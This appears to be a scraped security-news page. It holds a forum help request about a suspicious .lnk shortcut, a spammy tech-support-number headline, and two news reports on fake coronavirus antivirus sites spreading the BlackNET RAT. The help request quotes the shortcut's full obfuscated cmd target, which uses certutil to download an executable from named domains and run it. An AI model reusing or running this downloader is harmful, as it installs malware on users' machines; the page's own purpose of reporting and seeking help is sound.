Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Image
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

MALWAREBYTES done tech number# MALWAREBYTES B customer.care suppM - Patch.com

MALWAREBYTES done tech number# MALWAREBYTES B customer.care suppM - Patch.com


MALWAREBYTES done tech number# MALWAREBYTES B customer.care suppM - Patch.com

Posted: 23 Mar 2020 12:51 AM PDT

[unable to retrieve full-text content]MALWAREBYTES done tech number# MALWAREBYTES B customer.care suppM  Patch.com

Fake Corona Antivirus Software Used to Install Backdoor Malware - BleepingComputer

Posted: 23 Mar 2020 04:12 PM PDT

Fake Corona Antivirus Software Used to Install Backdoor Malware

Sites promoting a bogus Corona Antivirus are taking advantage of the current COVID-19 pandemic to promote and distribute a malicious payload that will infect the target's computer with the BlackNET RAT and add it to a botnet.

The two sites promoting the fake antivirus software can be found at antivirus-covid19[.]site and corona-antivirus[.]com as discovered by the Malwarebytes Threat Intelligence team and researchers at MalwareHunterTeam, respectively.

While the former was already taken down since Malwarebytes' report, the one spotted by MalwareHunterTeam is still active but it had its contents altered, with the malicious links removed and a donation link added to support the scammers' efforts — spoiler alert, no donations were made until now.

The malicious site

"Download our AI Corona Antivirus for the best possible protection against the Corona COVID-19 virus," the site reads. "Our scientists from Harvard University have been working on a special AI development to combat the virus using a mobile phone app.

Last but not least, the malicious sites' makers also mention an update that will add VR sync capabilities to their fake antivirus: "We analyse the corona virus in our laboratory to keep the app always up to date! Soon a corona antivirus VR synchronization will be implemented!"

If anyone would fall this, they would end up downloading an installer from antivirus-covid19[.]site/update.exe (link is now down) that will deploy the BlackNET malware onto their systems if launched.

BlackNET will add the infected device to a botnet that can be controlled by its operators:

• to launch DDoS attacks
• to upload files onto the compromised machine
• to execute scripts
• to take screenshots
• to harvest keystrokes using a built-in keylogger (LimeLogger)
• to steal bitcoin wallets
• to harvest browser cookies and passwords.

The BlackNET RAT, which was rated as 'skidware malware' by MalwareHunterTeam, is also capable to detect if it's being analyzed within a VM and it will check for the presence of analysis tools commonly used by malware researchers, per c0d3inj3cT's analysis.

BlackNET command panel
BlackNET command panel

The malware also comes with bot management features including restarting and shutting down the infected devices, uninstalling or updating the bot client, and opening visible or hidden web pages.

One of the sites promoting this bogus Corona Antivirus was spotted by MalwareHunterTeam on March 6, while the other was exposed by Malwarebytes' Threat Intelligence team in a report published today.

In somewhat related news, an HHS.gov open redirect is currently abused by attackers to deliver Raccoon info-stealing malware payloads onto targets' systems via a coronavirus-themed phishing campaign.

The actors behind these ongoing phishing attacks use the open redirect to link to a malicious attachment that delivers a VBS script previously spotted while being employed by the operators behind Netwalker Ransomware to deploy their payloads.

The World Health Organization (WHO), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), and the U.S. Federal Trade Commission (FTC) have all warned about Coronavirus-themed phishing and attacks targeting potential victims from countries around the globe (1, 2, 3).

Fake antivirus site promises coronavirus protection, delivers trojan - ComputerWeekly.com

Posted: 24 Mar 2020 09:04 AM PDT

A fraudulent website that claims to offer a digital antivirus program that protects users against the Covid-19 coronavirus has been found online, tricking its victims into downloading a remote access trojan, or Rat, that turns the target computer into a bot.

The site in question is just one of a number of scam websites that have been newly identified by Malwarebytes, and more are popping up all the time, as cyber criminals try out any means to cash in on what is becoming, by some margin, one of the most dangerous and widespread cyber security threats in history.

"Scammers and malware authors are taking advantage of the coronavirus crisis in full swing. We have seen a number of spam campaigns using Covid-19 as a lure to trick people into installing a variety of malware, but especially data stealers," said the Malwarebytes threat intelligence team in a blog post disclosing its latest research.

"As more of us work from home, the need to secure your computer, especially if you are connecting to your company's network, becomes more important. However, you should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point."

It should go without saying that no cyber security antivirus product could possibly provide protection against an actual biological virus. However, those responsible for the scam – to which we are not linking – have almost certainly already ensnared numerous victims and will be counting on stressed and emotional people being more likely to fall for the trick.

Fake website offering protection against the coronavirus

The website (pictured) states: "Our scientists from Harvard University have been working on a special AI development to combat the virus using a windows app. Your PC actively protects you against the Coronaviruses (Cov) while the app is running."

If a user is unfortunate enough to install the application, they will find themselves infected by the BlackNET Rat, giving cyber criminals the ability to access the target machine from a command and control (C2) server.

BlackNET enables cyber criminals to co-opt the target machine into a botnet to conduct distributed denial of service (DDoS) attacks, to take screenshots, to steal Firefox cookies, to steal saved passwords, to implement a keylogger, to remotely execute other malicious scripts, and to steal bitcoin wallets if present. Malwarebytes said the full source code for this particular toolkit has been circulating on GitHub for at least a month.

"Users should be extra careful of bogus security software, especially if it tries to use the coronavirus as a selling point"
Malwarebytes threat intelligence team

In this instance, Malwarebytes was able to work with CloudFlare, whose service was being abused to deliver the malicious website. CloudFlare has now taken action to flag the website as a phishing scam.

"During this period, it is important to stay safe both at home and online. The number of scams we have seen during these past few weeks shows that criminals will take advantage of any situation, no matter how dire it is," the researchers said.

"We recommend that you keep your computer up to date and use extra caution when downloading new programs. Beware of instant notifications and other messages, even if they appear to come from friends."

More information, including further screengrabs and indicators of compromise (IoCs), can be found on the Malwarebytes website.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US